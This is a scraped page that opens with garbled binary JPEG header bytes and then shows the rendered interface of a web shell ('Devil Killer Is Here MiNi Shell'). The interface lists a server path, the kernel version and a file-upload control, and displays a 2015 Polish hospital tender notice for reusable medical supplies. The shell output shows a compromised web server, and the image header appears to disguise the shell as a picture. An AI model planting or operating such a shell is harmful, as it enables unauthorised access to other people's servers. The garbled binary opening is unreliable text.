JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151020/278178-N-2015.html

<p class="kh_header"><b>Tarnowskie Góry: SUKCESYWNE DOSTAWY NIESTERYLNEGO  SPRZĘTU  MEDYCZNEGO WIELORAZOWEGO UŻYTKU</b><br>
<b>Numer ogłoszenia: 278178 - 2015; data zamieszczenia: 20.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielospecjalistyczny Szpital Powiatowy Spółka Akcyjna , ul. Pyskowicka 47-51, 42-612 Tarnowskie Góry, woj. śląskie, tel. 32 285 40 58, faks 32 384 54 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wspsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNE DOSTAWY NIESTERYLNEGO  SPRZĘTU  MEDYCZNEGO WIELORAZOWEGO UŻYTKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy niesterylnego sprzętu medycznego wielorazowego użytku. Zamówienie składa się z 9 części tzw. pakietów, z których każdy stanowi oddzielny przedmiot zamówienia  
	Pakiet nr 1 - Pojemniki histopatologiczne
	Pakiet nr 2 - Pojemniki na odpady szpitalne
	Pakiet nr 3 - System do odsysania wydzielin ustrojowych
	Pakiet nr 4 - Materiały do EKG i EEG
	Pakiet nr 5 - Szyny Kramera i Zimmera
	Pakiet nr 6 - Drobny sprzęt medyczny wielorazowego użytku 1 
	Pakiet nr 7 - Drobny sprzęt medyczny wielorazowego użytku 2
	Pakiet nr 8 - Akcesoria do elektrochirurgii
	Pakiet nr 9 - Koszule przedoperacyjne
Szczegółowy opis przedmiotu zamówienia - asortyment oraz ilość znajdują się w załącznikach
D do SIWZ  - formularz asortymentowo - cenowy, pakiety 1-9.
Składane oferty muszą  zawierać pełny zakres przedmiotu zamówienia w danym pakiecie.
Zamawiający zastrzega sobie prawo realizowania zamówień w ilościach uzależnionych
od rzeczywistych potrzeb i posiadanych środków oraz do ograniczenia zamówienia w zakresie rzeczowym i ilościowym, co nie jest odstąpieniem od umowy nawet w części.
Zamawiający zastrzega sobie prawo do zmiany limitów ilościowych zamawianego asortymentu w stosunku do określonych w poszczególnych pozycjach pakietu, stanowiącego załącznik do umowy zarówno  in plus  jak i  in minus , bez zmiany wartości brutto przedmiotu umowy określonej w § 2 ust. 1 projektu umowy, a Wykonawca wyraża na to zgodę..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- katalog oferowanego asortymentu lub inny dokument w języku polskim zawierający szczegółowy opis asortymentu potwierdzający zgodność oferowanego przedmiotu zamówienia z zamówieniem wymaganym przez  Zamawiającego.
  Wykonawca winien opisać dokument numerem pakietu i pozycji, którego dotyczy; 
- złożyć oświadczenie według załącznika [C] do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony szczegółowo formularz oferty - część [C] stanowiący załącznik do SIWZ
2. Wypełniony formularz cenowy - część [D] stanowiący załącznik do SIWZ
3. Wzór oświadczeń - część [E.1], [E.2]stanowiący załącznik do SIWZ
4. Wzór oświadczeń - część [F] stanowiący załącznik do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin realizacji dostaw CITO - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych. 
2.  Strony dopuszczają zmiany umowy w zakresie:
    a)  zmiany stawki podatku od towarów i usług, gdzie zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian.
    b) numeru katalogowego produktu (zmiana nr kat nie wymaga aneksowania umowy),
    c) nazwy handlowej produktu przy zachowaniu jego parametrów,
    d) w razie konieczności zmiany miejsca dostawy.
3. Dopuszcza się zmianę umowy w zakresie przedmiotowym tj. zastąpienie produktu objętego umową  
    odpowiednikiem w przypadku:
a) gdy wystąpi przejściowy brak produktu z przyczyn leżacych po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu objętego umową,
b) gdy produkt zostanie wycofany z rynku, zostanie on zastąpiony produktem równoważnym,
c) w przypadku zaprzestania produkcji produkt zastąpiony produktem równoważnym,
    Każda zmiana asortymentu wymaga wcześniejszego pisemnego lub telefonicznego (z potwierdzeniem    
   faksem) uzgodnienia. Osobą upoważnioną do takich uzgodnień lub do akceptacji równoważnego produktu 
   leczniczego ze strony Zamawiającego jest Kierownik Apteki Szpitalnej. Zmiany w tym zakresie nie wymagają 
   aneksów do umowy.
    d)  przedłożenia przez wykonawcę oferty korzystniejszej dla Zamawiającego 
4. Zmiana, o której mowa w ust. 3 będzie dopuszczalną pod warunkiem, iż odpowiednik będzie tożsamy z przedmiotem zamówienia  i przy cenie nie wyższej niż cena produktu objętego umową.
5.  Wszelkie powyższe zmiany po uprzedniej akceptacji osoby odpowiedzialnej merytorycznie za realizację przedmiotu zamówienia.
6. Strony wspólnie ustalają, że w przypadku zmiany przepisów prawnych skutkujących wzrostem obciążeń publicznoprawnych dla Wykonawcy w związku z zatrudnianiem osób przy wykonywaniu zamówienia
na podstawie umów cywilnoprawnych, w szczególności dotyczących rozszerzenia obowiązku uiszczania przez Wykonawcę składek na ubezpieczenie społeczne od takich umów w wymiarze wyższym
niż dotychczas obowiązujący, kwota wynagrodzenia netto przysługująca Wykonawcy z tytułu realizacji umowy będzie zwiększona o wartość wzrostu tych składek, wymaganych według aktualnie obowiązujących przepisów. Zwaloryzowane wynagrodzenie Wykonawcy będzie obowiązywać od daty wejścia w życie nowych przepisów prawa.
7.  Zmiany umowy z wyjątkiem opisanych w pkt.2b niniejszego paragrafu wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wspsa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielospecjalistyczny Szpital Powiatowy S.A. w Tarnowskich Górach przy ul. Pyskowickiej 47-51 - Dział zamówień publicznych, budynek administracji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2015 godzina 09:30, miejsce: Wielospecjalistyczny Szpital Powiatowy S.A. w Tarnowskich Górach przy ul. Pyskowickiej 47-51 - Dział zamówień publicznych, budynek administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Pojemniki histopatologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	Ilość	J.m.
1	Pojemnik histopatologiczny
poj. 120ml	2200	szt.
2	Pojemnik histopatologiczny
poj. 250ml	370	szt.
3	Pojemnik histopatologiczny
poj. 500ml	310	szt.
4	Pojemnik histopatologiczny
poj. 850ml	220	szt.
5	Pojemnik histopatologiczny
poj. 2 000ml	90	szt.
6	Pojemnik histopatologiczny
poj. 3 400ml	30	szt.
7	Pojemnik histopatologiczny
poj. 5 600ml	100	szt.
1. Wykonawca dołączy do oferty materiały producenta: katalogi lub foldery w języku polskim zawierające opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.  
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Pojemniki na odpady szpitalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	Ilość	J.m.
1	Pojemnik na odpady szpitalne
poj. 2l	2500	szt.
2	Pojemnik na odpady szpitalne
poj. 10l	750	szt.
3	Pojemnik na odpady szpitalne
poj. 60l	40	szt.
4	Pojemnik na odpady szpitalne
poj. 0,7l	600	szt.
5	Pojemnik na odpady szpitalne
poj. 1l	1 800	szt.
1. Wykonawca dołączy do oferty materiały producenta: katalogi lub foldery w języku polskim zawierające opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.  
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - System do odsysania wydzielin ustrojowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	Ilość	J.m.
1	Wkład workowy jednorazowego użytku nie zawierający polichlorku winylu (PCV) z funkcją samozasysania, uszczelniany automatycznie z filtrem hydrofobowym - antybakteryjnym, tylko 1 króciec w pokrywie, obrotowy, stopniowany; substancja żelująca w środku pojemności 1 000ml	1 100	szt.
2	Wkład workowy jednorazowego użytku nie zawierający polichlorku winylu (PCV) z funkcją samozasysania, uszczelniany automatycznie z filtrem hydrofobowym - antybakteryjnym, tylko 1 króciec w pokrywie, obrotowy, stopniowany; substancja żelująca w środku pojemności 2 000ml	2 000	szt.
3	Pojemnik wielorazowego użytku na wkłady workowe, wykonany z przeźroczystego poliwęglanu z certyfikowaną skalą pomiarową, wyposażony w zintegrowany zaczep do mocowania oraz króciec obrotowy typu schodkowego, podłączony do źródła próżni na stałe, możliwość sterylizacji w 121st. C o poj. 1 000ml	5	szt.
4	Pojemnik wielorazowego użytku na wkłady workowe, wykonany z przeźroczystego poliwęglanu z certyfikowaną skalą pomiarową, wyposażony w zintegrowany zaczep do mocowania oraz króciec obrotowy typu schodkowego, podłączony do źródła próżni na stałe, możliwość sterylizacji w 121st. C o poj. 2 000ml	5	szt.
5	Uchwyt na szynę typu MODURA, kompatybilny z pojemnikami	5	szt.
Wymagania:
1. Wykonawca dołączy do oferty materiały producenta: katalogi lub foldery w języku polskim zawierające opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.  
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Materiały do EKG i EEG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	Ilość	J.m.
1	Elektroda j. uż. z wcięciem - dla dorosłych Holter	15 000	szt.
2	Elektroda j. uż. z żelem - dla dzieci	100	szt.
3	Elektroda j. uż. z żelem - dla dorosłych	22 000	szt.
4	Elektrody kończynowe dla dorosłych a 4szt.	5	kpl.
5	Elektrody przyssawkowe 20-25mm a 6 szt	5	kpl.
6	Elektroda do czasowej stymulacji serca 5F zagięta	4	szt.
7	Introduktor do elektrody z poz. nr 6	4	szt.
8	Papier EKG Ascard 3 z nadrukiem	190	szt.
9	Papier EKG Ascard 33 z nadrukiem	210	szt.
10	Papier EKG Ascard A4 z nadrukiem 	1 100	szt.
11	Żel UKG / USG 0,25l	900	szt.
12	Papier do videoprinterów K-61B	80	szt.
13	Papier do videoprinterów K 65 HM	50	szt.
14	Papier do aparatu KTG Sonicaid Oxford Team 7	60	szt.
15	Papier Team Meridian 800/143x150x300/	65	szt.
16	Papier HP M 1911A	20	szt.
17	Pas do EKG uniwersalny	5	szt.
Wymagania:
1. Wykonawca dołączy do oferty materiały producenta: katalogi lub foldery w języku polskim zawierające opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.  
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw CITO - 5</li>
</ul>
</li>
</ul><br>
